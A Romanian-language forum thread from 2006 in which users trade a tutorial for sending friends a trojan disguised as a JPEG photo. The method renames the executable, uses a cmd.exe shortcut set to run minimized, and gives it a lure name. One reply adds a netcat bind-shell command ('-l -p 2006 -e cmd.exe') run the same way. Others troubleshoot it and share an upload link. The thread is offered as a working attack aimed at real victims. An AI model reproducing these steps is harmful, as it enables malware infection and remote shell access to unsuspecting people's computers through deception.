shaokhan Posted December 5, 2006 Report Posted December 5, 2006 Exe 2 JPG, banuiesc ca multi ne-am intrebat cum sa facem ca sa ii trimitem prietenilor o poza care ascunde un trojan, ei bine nu se poate. A fost un exploit pentru JPEG (www.microsoft.com/technet/security/bulletin/MS04-028.mspx), cum zice si in link iti permitea code execution din poze in timp ce aceasta era deschisa. Cum toata lumea are updates facute nu se mai poate, oricum orice AV de rahat te atentioneaza ca poza este infectata. Eu am gasit o metoda care merge si lumea "pune botu". Care e ideea ... cmd.exe ruleaza executabile chiar daca ele sunt redenumite ca .txt, .jpg sau oricum vreti voi, cmd se uita la headerul fishierului si daca este executabil il ruleaza, va spune ceva acest lucru??? ei bine daca nu va explic eu in continuare de aia e tutorial, luam troajn.exe re-denumim in andreea.jpg, facem un folder nou si il punem in folder nou. ATENTIE!!! ca sa fiti siguri ca ati redenumit cum trebuie trojanu deschide-ti folderu in care ai introdus poza dai sus la TOOLS > FOLDER OPTIONS ... > VIEW (tab) si debifeaza Hide extensions for known file types. Ok acum ca avem andreea.jpg trebuie sa o shi rulam, foarte simplu faci un shortcut la poza (trojan) click drepata pe poza > Create shortcut. Click dreapta Shortcut poza > Proprerties si schimbi urmatoarele campuri exact asha:Target: C:WINDOWSsystem32cmd.exe /c andreea.jpgStart in: %currentdir%Run: MinimizedDai Apply, iar acum daca dai click pe shortcut trojanul tau este executat, nici macar antivirus nu il baga in seama (doarece este poza). Acum dai rename la shortcut cum vrei tu "Andreea Nacked" si trimiti. Cum si ce ii spui ca este nu stiu, dar ei vor incerca sa deschida poza si nu merge atunci vor incerca Andreea Nacked si s-au ars.Cam asta este tot despre exe to jpeg (singura metoda pe care o stiu) spre sa va ajute si tin sa mentionez ca asta e un articol pe care l-am cititi si eu mai de mult. Quote
crystygye Posted December 5, 2006 Report Posted December 5, 2006 mie nu imi merge.daca redenumesc in poza.jpg de ex, tot troian este, si antivirusul il gaseste.am incercat si cu shorcutu si nu a mers Quote
gigipop Posted December 6, 2006 Report Posted December 6, 2006 ii "tare" tutorealul doar ca nu ii neaparat sa pui un trojan.exe ca de exemplu eu am pus nc (netcat) Target: C:WINDOWSsystem32cmd.exe /c poza.jpg -d -l -p 2006 -e cmd.exeStart In: %currentdir%Si atunci nu mai vede antivirusu' nimic ...doar firewalul daca are :D (sa speram ca ii da unblock daca ii apare fereasta aia de la firewall)Merge perfect. 10x Quote
shaokhan Posted December 6, 2006 Author Report Posted December 6, 2006 crystygye wrote: mie nu imi merge.daca redenumesc in poza.jpg de ex, tot troian este, si antivirusul il gaseste.am incercat si cu shorcutu si nu a mersSi shortcut si trojan trebuie sa fie in acelasi folder cand le faci, o sa fac eu un exemplu cu un exe banal si o sa pun sus pe un cu link pentru el. S-ar putea sa nu-ti mearga daca ai uitat sa debifezi la folder options Hide know extension... update asap redcoder wrote: Stai linistit ca este detectat de av.Nu am zis neaparat ca este o metoda de a ascunde un trojan de AV; ci cum sa ascunzi un exe intr-un jpg, iar UNELE AV nu scaneaza poze (din cate stiu eu, daca gresesc te rog sa ma corectezi).Oki am facut upload: http://share.urbanfriends.us/savefile_php/uploads/e7f6b47292.rar Inauntru este un processor speed tester. Si foarte important aceast BUG sau exploit cum vreti sa ii zice-ti merge doar pe Windows XP si mai noi. Pe 2000, ME sau 98 nu merge. Quote
Sh4dow Posted December 11, 2006 Report Posted December 11, 2006 Nu neaparat! Majoritatea AVurilor scaneaza default doar dupa extensie Quote